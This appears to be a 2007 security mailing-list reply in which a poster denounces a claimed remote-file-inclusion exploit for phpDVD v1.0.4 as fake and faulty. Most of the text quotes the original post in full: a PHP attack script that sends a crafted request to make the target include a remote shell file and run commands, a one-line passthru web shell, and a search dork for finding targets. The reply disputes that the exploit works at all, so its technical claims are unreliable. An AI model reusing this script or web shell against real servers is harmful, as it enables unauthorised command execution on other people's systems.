FAKE!! i think that this guy just take some exploits on the web and modify them a little then re-post them.. index.php, first 2 lines: <? $dvd_config_file = "config.php"; // Full path and name of the config file so, where is the RFI? but is obvious that you do not understand anything of this, let's take a look at "your" exploit: $packet ="GET ".$p."index.php?dvd_config_file=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n"; i do not think that: 1 - will work with 2 '?' in the url 2 - you now why rgod or some one else putted %00 at the end of the url.. hope to never see you nick again Saturday, August 11, 2007, 5:04:36 PM, you wrote: > #!/usr/bin/php -q -d short_open_tag=on > <? > print ' > //'=============================================================================================== > //'[Script : phpDVD v1.0.4 > //'[Author : iLker Kandemir <ilkerkandemir[at]mynet.com> > //'[S.Page : http://ugo.scarlata.it/phpdvd/phpDVD-1.0.4.tar.gz > //'[Dork : "phpDVD v1.0.4" > //'=============================================================================================== > //'[[Code]]------------------------------------------------------ > //' > //' require($dvd_config_file); > //' > //'[[Code]]--------------------------------------------------------- > '; > if ($argc<4) { > print (' > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > Usage: php '.$argv[0].' host shell cmd OPTIONS > host: script server (ip/hostname) > shell: path to shell > cmd: a shell command (ls -la) > Options: > -p[port]: specify a port other than 80 > -P[ip:port]: specify a proxy > Example: > php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80 > shell.txt: <?php ob_clean();echo"iLker Kandemir > www.mefistolabs.com";ini_set("max_execution_time",0);echo > "mefistolabs";passthru($_GET["cmd"]);die;?> > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > '); > die; > } > error_reporting(0); > ini_set("max_execution_time",0); > ini_set("default_socket_timeout",5); > function quick_dump($string) > { > $result='';$exa='';$cont=0; > for ($i=0; $i<=strlen($string)-1; $i++) > { > if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) > {$result.=" .";} > else > {$result.=" ".$string[$i];} > if (strlen(dechex(ord($string[$i])))==2) > {$exa.=" ".dechex(ord($string[$i]));} > else > {$exa.=" 0".dechex(ord($string[$i]));} > $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} > } > return $exa."\r\n".$result; > } > $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; > function sendpackets($packet) > { > global $proxy, $host, $port, $html, $proxy_regex; > if ($proxy=='') { > $ock=fsockopen(gethostbyname($host),$port); > if (!$ock) { > echo 'No response from '.$host.':'.$port; die; > } > } > else { > $c = preg_match($proxy_regex,$proxy); > if (!$c) { > echo 'Not a valid proxy...';die; > } > $parts=explode(':',$proxy); > echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; > $ock=fsockopen($parts[0],$parts[1]); > if (!$ock) { > echo 'No response from proxy...';die; > } > } > fputs($ock,$packet); > if ($proxy=='') { > $html=''; > while (!feof($ock)) { > $html.=fgets($ock); > } > } > else { > $html=''; > while ((!feof($ock)) or > (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { > $html.=fread($ock,1); > } > } > fclose($ock); > #debug > #echo "\r\n".$html; > } > function make_seed() > { > list($usec, $sec) = explode(' ', microtime()); > return (float) $sec + ((float) $usec * 100000); > } > $host=$argv[1]; > $shell=$argv[2]; > $cmd=""; > $port=80; > $proxy=""; > for ($i=3; $i<$argc; $i++){ > $temp=$argv[$i][0].$argv[$i][1]; > if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} > if ($temp=="-p") > { > $port=str_replace("-p","",$argv[$i]); > } > if ($temp=="-P") > { > $proxy=str_replace("-P","",$argv[$i]); > } > } > if ($proxy=='') {$p='http://'.$host.':'.$port;} > $packet ="GET > ".$p."index.php?dvd_config_file=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n"; > $packet.="Host: ".$host."\r\n"; > $packet.="Connection: Close\r\n\r\n"; > sendpackets($packet); > if (strstr($html,"mefistolabs")) > { > $temp=explode("mefistolabs",$html); > die($temp[1]); > } > echo "Exploit ERROR"; > echo "www.mefistolabs.com"; ?>> > # MefistoLabs.Com -- Best regards, BlackHawk mailto:hawkgotyou@xxxxxxxxx
